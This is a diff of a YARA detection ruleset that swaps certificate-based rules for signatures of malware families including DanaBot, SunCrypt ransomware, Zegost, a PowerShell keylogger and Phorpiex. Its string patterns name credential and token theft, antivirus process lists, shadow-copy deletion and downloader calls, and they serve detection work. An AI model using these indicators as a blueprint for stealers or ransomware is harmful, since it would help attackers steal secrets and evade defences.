+		id = "cdb70164-3f72-553f-a6c5-190f699e0743"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L562-L573"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4412-L4428"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b88f346175e9084fdba94b9a8cbbf28a5012d28ab43350d927aac099921ab1a3"
+		logic_hash = "ea4b2281f906271dc249b5036b22eadfc5add94def4f8e4f8a40c384618465d8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "104c4183e248d63a6e2ad6766927b070c81afcb6"
-		importance = 20
+
+	strings:
+		$s1 = "\\SnowP\\Example\\Secured\\" ascii
+		$s2 = "{0}{3}Content-Type: {4}{3}Content-Disposition: form-data; name=\"{1}\"{3}{3}{2}{3}" wide
+		$s3 = "\"encrypted_key\":\"(.*?)\"" fullword wide
+		$s4 = "<SendToDiscord>d__" ascii
+		$s5 = "_urlWebhook" ascii
+		$r1 = "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}" fullword wide
+		$r2 = "^\\w+([-+.']\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*$" fullword wide
+		$r3 = "mfa\\.[\\w-]{84}" fullword wide
+		$r4 = "(\\w+)=(\\d+)-(\\d+)$" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ClamAV" and pe.signatures [ i ] . serial == "a5:96:fd:27:79:e5:07:aa:46:6d:15:97:06:fe:41:50" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $r* ) and 2 of ( $s* ) ) or 7 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_45D76C63929C4620Ab706772F5907F82 : FILE
+rule DITEKSHEN_MALWARE_Win_Danabot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects DanaBot variants"
 		author = "ditekSHen"
-		id = "6ade67b1-cff5-5e5d-917c-f31010e09b82"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a49e21b9-d40a-5273-a9a2-322a1ec9bbbc"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L575-L586"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4430-L4459"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9854a8812f55f2ae7cddc714b780def3d0511b236685a17ffe202711237c4b7e"
+		logic_hash = "8d037b46d719159dc3e60f0c7143022ce8745cfd753c3754ae80a220a838567d"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "67c4afae16e5e2f98fe26b4597365b3cfed68b58"
-		importance = 20
+
+	strings:
+		$s1 = "ms ie ftp passwords" fullword wide
+		$s2 = "CookieEntryEx_" fullword wide
+		$s3 = "winmgmts:\\\\localhost\\root\\cimv2" fullword wide
+		$s4 = "S-Password.txt" fullword wide
+		$s5 = "del_ini://Main|Password|" fullword wide
+		$s6 = "cmd.exe /c start chrome.exe --no-sandbox" wide
+		$s7 = "cmd.exe /c start firefox.exe -no-remote" wide
+		$s8 = "\\rundll32.exe shell32.dll,#" wide
+		$s9 = "S_Error:TORConnect" wide
+		$s10 = "InjectionProcess" fullword ascii
+		$s11 = "proxylogin" fullword wide
+		$s12 = "\\FS_Morff\\FS_Temp\\" wide
+		$ds1 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
+		$ds2 = "PExtended4" fullword ascii
+		$ds3 = "%s-%s" fullword wide
+		$ds4 = "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF0123456789ABCDEF" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEON CRAYON LIMITED" and pe.signatures [ i ] . serial == "45:d7:6c:63:92:9c:46:20:ab:70:67:72:f5:90:7f:82" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or all of ( $ds* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5029Daca439511456D9Ed8153703F4Bc : FILE
+rule DITEKSHEN_MALWARE_Win_Klackring : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Klackring variants. Associated with ZINC / Lazarus"
 		author = "ditekSHen"
-		id = "1d7f0d61-fbe7-58d1-a9d8-083678e8b9bd"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "7bd9a68f-d58b-5437-a28b-5a7f1a11038e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L588-L599"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4461-L4475"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "256b4bebbe4567de9e7d1938dd99f7f9fa13749de2f331aec0bc15f4ab5ab488"
+		logic_hash = "b894e89de720affadd80966d726a44ffce75d71095b0530edb6bfddb76660c54"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9d5ded35ffd34aa78273f0ebd4d6fa1e5337ac2b"
-		importance = 20
+
+	strings:
+		$s1 = "%s\\%s.dll" fullword wide
+		$s2 = "cmd.exe /c move /Y %s %s" fullword wide
+		$s3 = "%s\\win32k.sys" fullword wide
+		$s4 = "NetSvcInst_Rundll32.dll" fullword ascii
+		$s5 = "Spectrum.dll" fullword ascii wide
+		$s6 = "%s\\cmd.exe" fullword wide
+		$s7 = ".?AVA5Stream@@" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE GREEN PARTNERSHIP LTD" and pe.signatures [ i ] . serial == "50:29:da:ca:43:95:11:45:6d:9e:d8:15:37:03:f4:bc" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1C7D3F6E116554809F49Ce16Ccb62E84 : FILE
+rule DITEKSHEN_MALWARE_Win_Comebacker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects ComeBacker variants. Associated with ZINC / Lazarus"
 		author = "ditekSHen"
-		id = "66f4c531-5c0d-5467-a875-eff00a5d00c8"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d0454d09-4a15-5251-aa7a-cb00604715ca"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L601-L612"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4477-L4492"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f24037e6ac40844095e06ea12cebdf4dd22a35382c728f9586b90e40c57a4188"
+		logic_hash = "0d806fd199f0e8e3576ca837781c2fa06f1a09d75ea16602effb72754d8e4940"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = ""
-		importance = 20
+
+	strings:
+		$s1 = "ENGINE_get_RAND" ascii
+		$s2 = "./{IES" fullword ascii
+		$s3 = "TODO: <Company name>" fullword wide
+		$s4 = "@Microsoft Corperation. All rights reserved." fullword wide
+		$s5 = "Microsoft@Windows@Operating System" fullword wide
+		$x1 = "C:\\Windows\\System32\\rundll32.exe %s,%s %s %s" fullword ascii wide
+		$x2 = "ASN2_TYPE_new" fullword ascii wide
+		$x3 = "SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1549 LIMITED" and pe.signatures [ i ] . serial == "1c:7d:3f:6e:11:65:54:80:9f:49:ce:16:cc:b6:2e:84" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_75522215406335725687Af888Dcdc80C : FILE
+rule DITEKSHEN_MALWARE_Win_Suncrypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects SunCrypt ransomware"
 		author = "ditekSHen"
-		id = "712d41e1-6760-5124-8af2-c57a87816237"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "1a28fcbf-1fc0-5f18-ae71-2e813ed0f958"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L614-L625"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4494-L4532"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5166ea726b1be824e5702c411800236d60c44fbfc89a39b1bc103de965249d7d"
+		logic_hash = "abde9bbf2577304ff059972a38e803ba17de7a1f0346efe880a710f2ad79db37"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = ""
-		importance = 20
+
+	strings:
+		$s1 = "-noshares" fullword wide
+		$s2 = "-nomutex" fullword wide
+		$s3 = "-noreport" fullword wide
+		$s4 = "-noservices" fullword wide
+		$s5 = "$Recycle.bin" fullword wide
+		$s6 = "YOUR_FILES_ARE_ENCRYPTED.HTML" fullword wide
+		$s7 = "\\\\?\\%c:" fullword wide
+		$s8 = "locker.exe" fullword ascii
+		$s9 = "DllRegisterServer" fullword ascii
+		$g1 = "main.EncFile" fullword ascii nocase
+		$g2 = "main.detectName" fullword ascii nocase
+		$g3 = "main.detectIP" fullword ascii nocase
+		$g4 = "main.detectDebugProc" fullword ascii nocase
+		$g5 = "main.Bypass" ascii nocase
+		$g6 = "main.allocateMemory" fullword ascii nocase
+		$g7 = "main.killAV" fullword ascii nocase
+		$g8 = "main.disableShadowCopy" fullword ascii nocase
+		$g9 = "main.(*windowsDrivesModel).LoadDrives" fullword ascii nocase
+		$g10 = "main.IsFriends" fullword ascii nocase
+		$g11 = "main.walkMsg" fullword ascii nocase
+		$g12 = "main.makeSecretMessage" fullword ascii nocase
+		$g13 = "main.stealFiles" fullword ascii nocase
+		$g14 = "main.newKey" fullword ascii nocase
+		$g15 = "main.openBrowser" fullword ascii nocase
+		$g16 = "main.killProc" fullword ascii nocase
+		$g17 = "main.selfRemove" fullword ascii nocase
+		$m1 = "<h2>\\x20Offline\\x20HowTo\\x20</h2>\\x0a\\x09\\x09\\x09\\x09<p>Copy\\x20&\\x20Paste\\x20this\\x20message\\x20to" ascii
+		$m2 = "\\x20restore\\x20your\\x20files." ascii
+		$m3 = "\\x20your\\x20documents\\x20and\\x20files\\x20encrypted" ascii
+		$m4 = "\\x20lose\\x20all\\x20of\\x20your\\x20data\\x20and\\x20files." ascii
+		$m5 = ",'/#/client/','<h2>\\x20Whats\\x20Happen" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THEESOLUTIONS LTD" and pe.signatures [ i ] . serial == "75:52:22:15:40:63:35:72:56:87:af:88:8d:cd:c8:0c" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 6 of ( $g* ) or 3 of ( $m* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_768Ddcf9Ed8D16A6Bc77451Ee88Dfd90 : FILE
+rule DITEKSHEN_MALWARE_Win_Zegost : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Zegost"
 		author = "ditekSHen"
-		id = "f7d24c5f-e102-568e-bf44-47ccaad6225c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "cce29602-c096-53df-a99b-16f18ed43b80"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L627-L638"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4534-L4560"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ba98f0da84b678262ee98e5c5fec2aaeab9a0c304fd4552dd27e87aa54f79cdf"
+		logic_hash = "96727a0f5c113e5cdfe871f104553fd1c04a8f63ecbb8db7223afb71fcdd4087"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = ""
-		importance = 20
+
+	strings:
+		$s1 = "rtvscan.exe" fullword ascii
+		$s2 = "ashDisp.exe" fullword ascii
+		$s3 = "KvMonXP.exe" fullword ascii
+		$s4 = "egui.exe" fullword ascii
+		$s5 = "avcenter.exe" fullword ascii
+		$s6 = "K7TSecurity.exe" fullword ascii
+		$s7 = "TMBMSRV.exe" fullword ascii
+		$s8 = "RavMonD.exe" fullword ascii
+		$s9 = "kxetray.exe" fullword ascii
+		$s10 = "mssecess.exe" fullword ascii
+		$s11 = "QUHLPSVC.EXE" fullword ascii
+		$s12 = "360tray.exe" fullword ascii
+		$s13 = "QQPCRTP.exe" fullword ascii
+		$s14 = "knsdtray.exe" fullword ascii
+		$s15 = "V3Svc.exe" fullword ascii
+		$s16 = "??1_Winit@std@@QAE@XZ" fullword ascii
+		$s17 = "ClearEventLogA" fullword ascii
+		$s18 = "SeShutdownPrivilege" fullword ascii
+		$s19 = "%s\\shell\\open\\command" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THEESOLUTIONS LTD" and pe.signatures [ i ] . serial == "76:8d:dc:f9:ed:8d:16:a6:bc:77:45:1e:e8:8d:fd:90" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_59E378994Cf1C0022764896D826E6Bb8 : FILE
+rule DITEKSHEN_MALWARE_Win_GENERIC01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects known unamed malicious executables, mostly DLLs"
 		author = "ditekSHen"
-		id = "465d0b0c-c9fa-5364-a5f4-0d765ee40081"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3c16df71-f2e2-591c-b377-7e5ed697d43f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L640-L651"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4562-L4575"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1720636723f0eeab074e29e7c9bf2df3c8d951e27b25ea4b7db60f6c00102589"
+		logic_hash = "ddae979db5ddda772ca66a3d50e4b5479b16052ea002fd04fdbf295ce784e291"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9a17d31e9191644945e920bc1e7e08fbd00b62f4"
-		importance = 20
-
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SEVA MEDICAL LTD" and pe.signatures [ i ] . serial == "59:e3:78:99:4c:f1:c0:02:27:64:89:6d:82:6e:6b:b8" )
-}
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3D2580E89526F7852B570654Efd9A8Bf : FILE
-{
-	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
-		author = "ditekSHen"
-		id = "a80493e6-ed0c-597a-a87e-19c8fa8dd8ce"
-		date = "2020-11-19"
-		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L668-L679"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "19f418672850536aaac1983b45c3239d5c81c1e4b9b6ee36a761cfc7e2351531"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		thumbprint = "c1b4d57a36e0b6853dd38e3034edf7d99a8b73ad"
-		importance = 20
+	strings:
+		$s1 = "\\wmkawe_%d.data" ascii
+		$s2 = "\\resmon.resmoncfg" ascii
+		$s3 = "ByPassUAC" fullword ascii
+		$s4 = "rundll32.exe C:\\ProgramData\\Sandboxie\\SbieMsg.dll,installsvc" fullword ascii nocase
+		$s5 = "%s\\SbieMsg." ascii
+		$s6 = "Stupid Japanese" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIKL LIMITED" and pe.signatures [ i ] . serial == "3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : FILE
+rule DITEKSHEN_MALWARE_Win_GENERIC02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects known unamed malicious executables"
 		author = "ditekSHen"
-		id = "1ef8f8b6-e4e9-5504-94bd-b24e81de5694"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d0d24e69-0e99-5766-8e8e-9cdce902fa8f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L681-L692"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4577-L4591"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c9bfbef4470ee2339ef68484f8a4f21628c0cf9a07770d68d91e6c11e0345786"
+		logic_hash = "4f750c871ee061ed2d5d1f68e6ac1f56b8127321cfc207e2dd1dbed9d9848ce5"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "acb38d45108c4f0c8894040646137c95e9bb39d8"
-		importance = 20
+
+	strings:
+		$s1 = "{%s-%d-%d}" fullword wide
+		$s2 = "update" fullword wide
+		$s3 = "https://" fullword wide
+		$s4 = "http://" fullword wide
+		$s5 = "configure" fullword ascii
+		$s6 = { 8d 4f 02 e8 8c ff ff ff 8b d8 81 fb 00 dc 00 00 }
+		$s7 = { 83 c1 02 e8 3c ff ff ff 8b c8 ba ff 03 00 00 8d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA LTD" and pe.signatures [ i ] . serial == "5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_378D5543048E583A06A0819F25Bd9E85 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent06 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects known downloader agent downloading encoded binaries in patches"
 		author = "ditekSHen"
-		id = "3525888c-9558-5164-b94e-b16511a5ea72"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "00cb5184-b12d-5014-bee8-116cc72dfa47"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L694-L705"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4593-L4610"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29c6ae99675b8ab2c497faad71791c3fc018e92447bd96f5b2b3f426e1a1322b"
+		logic_hash = "9188804ad0e08f3e0cd09eb8815abea14da5aa28aef9084d19108a24f49f65c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cf933a629598e5e192da2086e6110ad1974f8ec3"
-		importance = 20
+		snort2_sid = "920122"
+		snort3_sid = "920119"
+
+	strings:
+		$s1 = "totallist" fullword ascii wide
+		$s2 = "LINKS_HERE" fullword wide
+		$s3 = "[SPLITTER]" fullword wide
+		$var2_1 = "DownloadWeb" fullword ascii
+		$var2_2 = "WriteByte" fullword ascii
+		$var2_3 = "MemoryStream" fullword ascii
+		$var2_4 = "DownloadString" fullword ascii
+		$var2_5 = "WebClient" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KITTY'S LTD" and pe.signatures [ i ] . serial == "37:8d:55:43:04:8e:58:3a:06:a0:81:9f:25:bd:9e:85" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 2 of ( $var2* ) ) or ( 4 of ( $var2* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Fdb6F4C09A1Ad69D4Fd2E46Bb1F54313 : FILE
+rule DITEKSHEN_MALWARE_Win_PWSH_Poshkeylogger
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects PowerShell PoshKeylogger"
 		author = "ditekSHen"
-		id = "e1250c37-fa89-5b8e-bea2-3b5e14039aea"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a816d716-caeb-5f08-9043-29db531f9e7c"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L720-L731"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4612-L4627"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ce78ab52d8aeb87ada9cb86007907a8ad46e91982cc8fff43a61e7ec96609eb2"
+		logic_hash = "20bde87ded7e3b68bc554c4b9a6c2ef08514f0d47b6b144763927bede81ea540"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "4d1bc69003b1b1c3d0b43f6c17f81d13e0846ea7"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "::GetKeyboardState" ascii
+		$s2 = "GetAsyncKeyState(" ascii
+		$s3 = "::MapVirtualKey(" ascii
+		$s4 = "::GetAsyncKeyState" ascii
+		$s5 = "Start-Sleep" ascii
+		$s6 = "send-mailmessage" ascii
+		$s7 = "[System.IO.File]::AppendAllText($" ascii
+		$s8 = "new-object Management.Automation.PSCredential $" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FDSMMCME" and pe.signatures [ i ] . serial == "fd:b6:f4:c0:9a:1a:d6:9d:4f:d2:e4:6b:b1:f5:43:13" )
+		6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_E5Bf5B5C0880Db96477C24C18519B9B9 : FILE
+rule DITEKSHEN_MALWARE_Win_Fujinamarat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects FujinamaRAT"
 		author = "ditekSHen"
-		id = "a28dbf8f-1b30-525d-baaf-51342aaf1cb3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f6b08713-1c03-5914-b0a2-ea9164a3f2cb"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L733-L744"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4629-L4645"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3e0401a9cf3005abac24114193f34bf439107bf6661b7c2c0b66ca91438c7b9"
+		logic_hash = "42557094afe67196442f46d76f156c09852d694bcc5f03eac51e79ad247c2fdd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = ""
-		importance = 20
+		snort2_sid = "920124"
+		snort3_sid = "920121"
+
+	strings:
+		$s1 = "GetAsyncKeyState" fullword ascii
+		$s2 = "HTTP/1.0" fullword wide
+		$s3 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" fullword wide
+		$s4 = "frmMain" fullword ascii
+		$s5 = "G<=>?@ABGGGGGGGGGGGGGGGGGGGGGGGGGGCDEF" fullword ascii
+		$s6 = "VBA6.DLL" fullword ascii
+		$s7 = "t_save" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WATWGHFC" and pe.signatures [ i ] . serial == "e5:bf:5b:5c:08:80:db:96:47:7c:24:c1:85:19:b9:b9" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ede6Cfbf9Fa18337B0Fdb49C1F693020 : FILE
+rule DITEKSHEN_MALWARE_Win_Phorpiex : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Phorpiex variants"
 		author = "ditekSHen"
-		id = "f1f34147-132e-53a3-b82c-d98121fc3f2c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e2d26c5f-939e-53e3-8730-622341d26273"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L746-L757"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4647-L4666"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "27f06a7a07b818fd34f5d23fd8e78f041063e035c1f8caa99aaaf53ec73a717a"
+		logic_hash = "4c48a20aaf37d65471710181238d2c39c1cb0fc5a37b9c411e8d4dcfd7a9e26e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a99b52e0999990c2eb24d1309de7d4e522937080"
-		importance = 20
+
+	strings:
+		$s1 = "ShEllExECutE=__\\DriveMgr.exe" fullword wide nocase
+		$s2 = "/c start __ & __\\DriveMgr.exe & exit" fullword wide nocase
+		$s3 = "%s\\autorun.inf" fullword wide
+		$s4 = "svchost." wide
+		$s5 = "%ls\\%d%d" wide
+		$s6 = "bitcoincash:" ascii
+		$s7 = "%ls:*:Enabled:%ls" fullword wide
+		$s8 = "%s\\%s\\DriveMgr.exe" fullword wide
+		$s9 = "api.wipmania.com" ascii
+		$v1_1 = "%appdata%" fullword wide
